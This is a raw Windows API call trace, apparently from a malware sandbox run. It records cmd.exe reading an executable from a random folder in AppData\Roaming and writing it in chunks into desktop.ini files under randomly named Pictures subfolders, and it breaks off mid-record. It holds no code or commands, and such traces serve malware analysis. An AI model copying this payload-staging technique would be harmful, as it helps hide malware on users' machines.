[0144.019] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0144.139] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef21c | out: lpExitCode=0x2ef21c*=0x0) returned 1 [0144.140] CloseHandle (hObject=0x50) returned 1 [0144.140] _vsnwprintf (in: _Buffer=0x2ef364, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef228 | out: _Buffer="00000000") returned 8 [0144.140] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0144.140] GetEnvironmentStringsW () returned 0x442670* [0144.140] FreeEnvironmentStringsW (penv=0x442670) returned 1 [0144.140] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0144.140] GetEnvironmentStringsW () returned 0x442670* [0144.140] FreeEnvironmentStringsW (penv=0x442670) returned 1 [0144.140] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef280 | out: lpAttributeList=0x2ef280) [0144.140] GetConsoleTitleW (in: lpConsoleTitle=0x2ef600, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.141] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee678, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ee67c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee678*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0144.141] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0144.141] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0144.141] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0144.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\desktop.ini")) returned 0xffffffff [0144.141] GetLastError () returned 0x2 [0144.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x10 [0144.141] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0144.142] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0144.142] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\desktop.ini")) returned 0xffffffff [0144.142] GetLastError () returned 0x2 [0144.142] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x4436fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4436fc) returned 0xffffffff [0144.142] GetLastError () returned 0x2 [0144.142] _get_osfhandle (_FileHandle=2) returned 0xb [0144.142] GetFileType (hFile=0xb) returned 0x2 [0144.142] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0144.142] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ef078 | out: lpMode=0x2ef078) returned 1 [0144.142] _get_osfhandle (_FileHandle=2) returned 0xb [0144.142] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ef0ac | out: lpConsoleScreenBufferInfo=0x2ef0ac) returned 1 [0144.143] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.143] GetFileType (hFile=0x7) returned 0x2 [0144.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef79c | out: lpMode=0x2ef79c) returned 1 [0144.144] _dup (_FileHandle=1) returned 3 [0144.144] _close (_FileHandle=1) returned 0 [0144.144] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini", _String2="con") returned -53 [0144.144] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef76c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0144.145] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0144.145] GetConsoleTitleW (in: lpConsoleTitle=0x2ef59c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.145] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2ef100, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef100) returned 0x43e6f0 [0144.145] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0144.145] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0144.145] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0144.145] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee00c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0144.145] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0144.145] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] GetFileType (hFile=0x58) returned 0x1 [0144.146] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2ee064 | out: lpFileSizeHigh=0x2ee064*=0x0) returned 0x7d600 [0144.146] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.146] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.147] GetFileType (hFile=0x50) returned 0x1 [0144.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.147] GetFileType (hFile=0x50) returned 0x1 [0144.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.147] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.148] GetFileType (hFile=0x50) returned 0x1 [0144.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.148] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.148] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.149] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.149] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.151] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.151] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.152] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.152] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.153] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.154] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.155] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.155] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, 